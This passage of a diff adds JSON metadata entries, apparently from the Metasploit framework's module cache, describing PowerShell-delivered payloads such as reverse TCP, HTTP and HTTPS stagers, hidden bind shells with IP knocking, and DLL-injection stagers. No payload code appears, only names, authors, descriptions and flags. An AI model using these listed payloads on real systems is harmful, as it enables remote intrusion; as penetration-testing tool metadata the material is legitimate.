"is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/reverse_http_proxy_pstore", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/reverse_http_proxy_pstore", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_http_proxy_pstore" + }, + "payload_cmd/windows/powershell/custom/reverse_https": { + "name": "Powershell Exec, Windows shellcode stage, Windows Reverse HTTPS Stager (wininet)", + "fullname": "payload/cmd/windows/powershell/custom/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows wininet)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/reverse_https", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_https" + }, + "payload_cmd/windows/powershell/custom/reverse_ipv6_tcp": { + "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager (IPv6)", + "fullname": "payload/cmd/windows/powershell/custom/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "skape ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker over IPv6", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/reverse_ipv6_tcp", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_ipv6_tcp" + }, + "payload_cmd/windows/powershell/custom/reverse_named_pipe": { + "name": "Powershell Exec, Windows shellcode stage, Windows x86 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/cmd/windows/powershell/custom/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/reverse_named_pipe", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_named_pipe" + }, + "payload_cmd/windows/powershell/custom/reverse_nonx_tcp": { + "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/custom/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "vlad902 " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker (No NX)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/reverse_nonx_tcp", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_nonx_tcp" + }, + "payload_cmd/windows/powershell/custom/reverse_ord_tcp": { + "name": "Powershell Exec, Windows shellcode stage, Reverse Ordinal TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/custom/reverse_ord_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "spoonm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/reverse_ord_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/reverse_ord_tcp", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_ord_tcp" + }, + "payload_cmd/windows/powershell/custom/reverse_tcp": { + "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager", + "fullname": "payload/cmd/windows/powershell/custom/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "skape ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/reverse_tcp", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_tcp" + }, + "payload_cmd/windows/powershell/custom/reverse_tcp_allports": { + "name": "Powershell Exec, Windows shellcode stage, Reverse All-Port TCP Stager", + "fullname": "payload/cmd/windows/powershell/custom/reverse_tcp_allports", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "skape ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/reverse_tcp_allports", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/reverse_tcp_allports", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_tcp_allports" + }, + "payload_cmd/windows/powershell/custom/reverse_tcp_dns": { + "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager (DNS)", + "fullname": "payload/cmd/windows/powershell/custom/reverse_tcp_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/reverse_tcp_dns", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/reverse_tcp_dns", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_tcp_dns" + }, + "payload_cmd/windows/powershell/custom/reverse_tcp_rc4": { + "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/custom/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_tcp_rc4" + }, + "payload_cmd/windows/powershell/custom/reverse_tcp_rc4_dns": { + "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", + "fullname": "payload/cmd/windows/powershell/custom/reverse_tcp_rc4_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/reverse_tcp_rc4_dns", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/reverse_tcp_rc4_dns", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_tcp_rc4_dns" + }, + "payload_cmd/windows/powershell/custom/reverse_tcp_uuid": { + "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/powershell/custom/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_tcp_uuid" + }, + "payload_cmd/windows/powershell/custom/reverse_udp": { + "name": "Powershell Exec, Windows shellcode stage, Reverse UDP Stager with UUID Support", + "fullname": "payload/cmd/windows/powershell/custom/reverse_udp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "RageLtMan " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/reverse_udp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/reverse_udp", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_udp" + }, + "payload_cmd/windows/powershell/custom/reverse_winhttp": { + "name": "Powershell Exec, Windows shellcode stage, Windows Reverse HTTP Stager (winhttp)", + "fullname": "payload/cmd/windows/powershell/custom/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows winhttp)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/reverse_winhttp", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_winhttp" + }, + "payload_cmd/windows/powershell/custom/reverse_winhttps": { + "name": "Powershell Exec, Windows shellcode stage, Windows Reverse HTTPS Stager (winhttp)", + "fullname": "payload/cmd/windows/powershell/custom/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows winhttp)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/reverse_winhttps", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_winhttps" + }, + "payload_cmd/windows/powershell/dllinject/bind_hidden_ipknock_tcp": { + "name": "Powershell Exec, Hidden Bind Ipknock TCP Stager", + "fullname": "payload/cmd/windows/powershell/dllinject/bind_hidden_ipknock_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection", + "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dllinject/bind_hidden_ipknock_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/bind_hidden_ipknock_tcp", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/bind_hidden_ipknock_tcp" + }, + "payload_cmd/windows/powershell/dllinject/bind_hidden_tcp": { + "name": "Powershell Exec, Hidden Bind TCP Stager", + "fullname": "payload/cmd/windows/powershell/dllinject/bind_hidden_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection", + "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dllinject/bind_hidden_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/bind_hidden_tcp", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/bind_hidden_tcp" + }, + "payload_cmd/windows/powershell/dllinject/bind_ipv6_tcp": { + "name": "Powershell Exec, Bind IPv6 TCP Stager (Windows x86)", + "fullname": "payload/cmd/windows/powershell/dllinject/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dllinject/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/bind_ipv6_tcp" + }, + "payload_cmd/windows/powershell/dllinject/bind_ipv6_tcp_uuid": { + "name": "Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/cmd/windows/powershell/dllinject/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dllinject/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/powershell/dllinject/bind_named_pipe": { + "name": "Powershell Exec, Windows x86 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/powershell/dllinject/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "UserExistsError" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dllinject/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/bind_named_pipe", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/bind_named_pipe" + }, + "payload_cmd/windows/powershell/dllinject/bind_nonx_tcp": { + "name": "Powershell Exec, Bind TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/dllinject/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "vlad902 " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (No NX)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dllinject/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/bind_nonx_tcp", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/bind_nonx_tcp" + }, + "payload_cmd/windows/powershell/dllinject/bind_tcp": { + "name": "Powershell Exec, Bind TCP Stager (Windows x86)", + "fullname": "payload/cmd/windows/powershell/dllinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dllinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/bind_tcp", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/bind_tcp" + }, + "payload_cmd/windows/powershell/dllinject/bind_tcp_rc4": { + "name": "Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/dllinject/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dllinject/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/bind_tcp_rc4" + }, + "payload_cmd/windows/powershell/dllinject/bind_tcp_uuid": { + "name": "Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/cmd/windows/powershell/dllinject/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dllinject/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/bind_tcp_uuid" + }, + "payload_cmd/windows/powershell/dllinject/find_tag": { + "name": "Powershell Exec, Find Tag Ordinal Stager", + "fullname": "payload/cmd/windows/powershell/dllinject/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUse an established connection", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dllinject/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/find_tag", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/findtag_ord" + }, + "payload_cmd/windows/powershell/dllinject/reverse_http": { + "name": "Powershell Exec, Windows Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/powershell/dllinject/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + 